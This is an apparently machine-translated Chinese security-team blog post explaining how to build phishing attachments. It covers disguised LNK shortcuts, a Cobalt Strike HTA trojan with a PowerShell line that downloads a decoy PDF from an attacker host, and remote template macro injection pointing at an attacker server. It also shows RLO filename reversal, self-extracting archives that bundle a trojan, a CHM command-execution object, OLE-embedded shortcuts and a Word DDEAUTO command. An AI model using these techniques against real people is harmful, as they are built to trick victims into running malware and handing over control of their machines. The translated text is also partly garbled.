Common techniques of email attachment phishing

        Technical communication

  Pay attention to WeChat public number  Z20 Security team  , reply   Add group  , Pull you into the group Discuss technology together .

The official account is copied. , The layout may be a bit messy , You can go to the official account .

INK

lnk⽂ Pieces of , Simply understood as "fast" ⽅ type , establish ⽅ The formula is as follows ：

The following figure for calc.exe The quickness of ⽅ Attribute information of formula , We can do it in “⽬ mark ” Column writing ⼊⾃⼰ Malicious commands , Such as powershell Online command ：

And then run , Can be in CS go online .

⽽ In the implementation of fishing ⻥ In the process , For our calc.exe The quickness of ⽅ In other words ,⼀ individual ⼤⼤ The computer ico Icon , Obviously it doesn't look like ⼀ A funny idea , So you can try in “ attribute ” To change the ⽂ The icon of the piece ：

however ⽤ System ⾃ Band ico To do ⽂ If the icon is replaced , There is a drawback , That is, when the ico stay ⽬ Mark when the machine does not exist , A similar blank will appear ⽩ico Icon ：

A better way is to modify lnk Of icon_location Sign a , Change to relevant suffix , The system can ⾃ Think of the corresponding opening ⽅ type ：

use winhex perhaps 010 Editor Open the LNK file , find String Data part ICON_LOCATION character string ：

We'll change it to .\1.pdf(Unicode), Its length 0x07：

07002E005C0031002E00700064006600

my pdf The default is a edge Browser open , It's in icon_location Set in the for pdf When suffix ,⽂ Piece ico It will also be automatically displayed as edge Browser open Icon , In this way, we can achieve ⾃ The effect of adaptation ：

When the victim is attacked, open our so-called pdf, In fact, it is a malicious shortcut ⽅ Formula time , Double click , There was no reaction , There may be a ⼀ Silk doubt , So you can try ⽤powershell、mshta etc. ⽅ When online , We can change such as cobaltstrike⽣ The code of success , add ⼀ paragraph ⾃ Dynamic download opens ⼀ Really pdf, To achieve realistic results , The specific process is as follows ：

First, create a new point %windir%\System32\mshta.exe Shortcut to ( File names should be as confusing as possible ), And change its icon to %SystemRoot%\System32\SHELL32.dll Any one of ：

Use CS Generate a powershell The way of HTA Trojan horse

open hta file , In its execution payload Add the following before sentence ：

Dim open_pdfSet open_pdf = CreateObject("Wscript.Shell")open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.50.15:8000/1.pdf',$env:temp+'\1.pdf');Start-Process $env:temp'\1.pdf'", 0, true

then python Get up http service

thus , Before the victim opens LNK The file will be downloaded from the remote for a normal time PDF Document and open .

Next, use the above method to change the shortcut icon to pdf The icon .

Use CS Set up HTA File download ：

Then change the parameters of the shortcut to HTA Download address ：

Then double-click the LNK file , The host will go online , And the victim will see a normal PDF file ：

macro

CS

Generate office Macro virus file , This package generates a VBA macro , You can embed it in Microsoft Word or Excel In the document . This attack applies to Windows Upper x86 and x64 Office

stay word View function of ⼊ Related macro ：

Just create a macro , take CS Of Macro Just copy the code and save it . function ,word You can go online .（excel similar ）

But this approach has a drawback , That is, macro code exists locally , It is very easy to be killed by soft check .

Remote template injection macro code

So we can try to make ⽤ Loading templates remotely ⽅ Type in advance ⾏ Macro loading .

principle ：

utilize Word A malicious request initiated by a defect when a document loads an attached template , And achieve the purpose of the attack , So when the target user clicks on the malicious message sent by the attacker Word Documents can be sent to remote servers by sending malicious requests , Then load the template and execute the macro of the malicious template .

The document sent does not carry malicious code , So it can pass many static tests . Just remotely DOTM Write macro virus or Trojan horse in the document .

Ideas ：

Write a With macro code DOTM file , Upload server

Write a With a template DOCX file

Compress the document to find and change settings.xml.rels Contents of the file , Will be one of the target The content is modified to be on the server DOTM Document URL

take DOCX The decompressed content is compressed into... In storage mode ZIP

Change the suffix to DOCX, After opening, you can remotely inject macro documents

newly build word, Open the macro code editing environment , In this document ThisDocument Next , Write as follows Macro code

When saving, the save type is dotm :

Turn on Web service , Put it in its directory , http://192.168.111.234/cs_macro.dotm

Make docx

Create a resume template word file ：

take word file extension docx Change it to zip, decompression , find settings.xml.rels

Open with text editor , modify target term , Available protocols are ftp、smb、http, Use here http:

take target Change the content to http://192.168.111.234/cs_macro.dotm

Then select all files in the directory , Compress it into macro_test.zip, Then change the suffix to docx

Production complete .

Double-click to open , Start macro , You can go online ：

File name inversion RLO

RLO, namely Right-to-Left Override, We can do it in ⽂ Insert in part name ⼊ Such kind unicode character , In order to achieve ⽂ The effect of name reversal .

With calc.exe For example ,

Rename it to calcgpj.exe, And then in calc And g Right click between , Look at the picture

ok, It has become With jpg At the end . But double click to run exe The format in which .

recycling ResourceHacker Modify icon .

Find a picture to convert to ico Format .

http://www.bitbug.net/

Pictured , Double clicking is actually running calc.

Self decompression

First we need to prepare the Trojan horse (cmd.exe)、 Normal procedure (calc.exe)

1. Select two programs , Then add to the compressed file , Create self extracting

2. Advanced self extraction options , routine ： Decompression path ——> Absolute path ：

Path write C:\windows\temp

3. Advanced self extraction options -> Set up

C:\windows\temp\ The selected Trojan name

C:\windows\temp\ Selected program name

4. Advanced self extraction options -> Pattern

silent mode -> Hide all

5. Advanced self extraction options -> to update

Update mode -> Unzip and update

Overlay mode -> Cover all files

6. determine

Execute it. , It was found that the effect was achieved , Here we also need to do some details of the camouflage .

Use Resource Hacker Change the icon ：

function

Self decompression +RLO

1. take png Pictures and muma.exe Self decompress into gnp.exe

2. RLO, The file name is reversed to exe.png

3. modify exe.png Icon , Become a picture

4. function , It looks like a picture ⽚, The suffix is also a graph ⽚, Opening is also a diagram ⽚, But the Trojan successfully executed

double-click ,pikaexe.jpg

CHM e-book

CHM（Compiled Help Manual） namely “ Compiled help files ”. It is a new generation of Microsoft Help file format , utilize HTML Write the source text , Compile and store the help content in the form of database .

Make CHM You need a tool EasyCHM（http://www.etextwizard.com/）

Create a new one html file , Coding format ANSI, Write the following into it

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',cmd.exe,/c calc.exe'>

// This row is used to execute commands , Be careful cmd.exe Before and after , perhaps <PARAM name="Item1" value=',powershell.exe,-c calc.exe'> It's OK

<PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

use easychm, newly build - Browse - choice html File directory - compile

Generate a chm, double-click , Opened the calculator

office OLE+LNK

The core goal is to create an embedded lnk The file induces the user to click , To execute the command .word,excel Can use

We create a shortcut as follows

The target is

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc

Then open the word file , Insert object , choice package, To be more realistic, check show as icon , Then you can change the icon , We select a more confusing icon at the change icon

Then enter the create package interface , Choose the one we just created lnk file , Write the volume label , Then insert the software package into word Interface , As long as the user clicks on the package and selects execute , Will execute our lnk Code defined in

Binding file

K8 The system is equipped with bundled enhanced version V2.0.EXE

Super file bundle

Generate , After execution, it will execute cmd.exe Same effect , But the backdoor software was also executed .

Word DDE

stay word In the document , Input ctrl+F9, Enter the field code edit . We can type the following code to execute system commands when the file is opened （word2019 Recurrence failed ,word2016 success , It seems to be word Version of the problem
This is quite practical , At present, there are many word Macro is disabled by default ,dde The user only needs to click two buttons to execute , Practicality is better than macros

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

Then when you open the file, two dialog boxes will appear , All the above commands will be executed

Technical communication

Communication group

Pay attention to the reply of the official account “ Add group ”, add to Z2OBot Small K Automatically pull you to join Z2O Security attack and defense communication group Share more good things .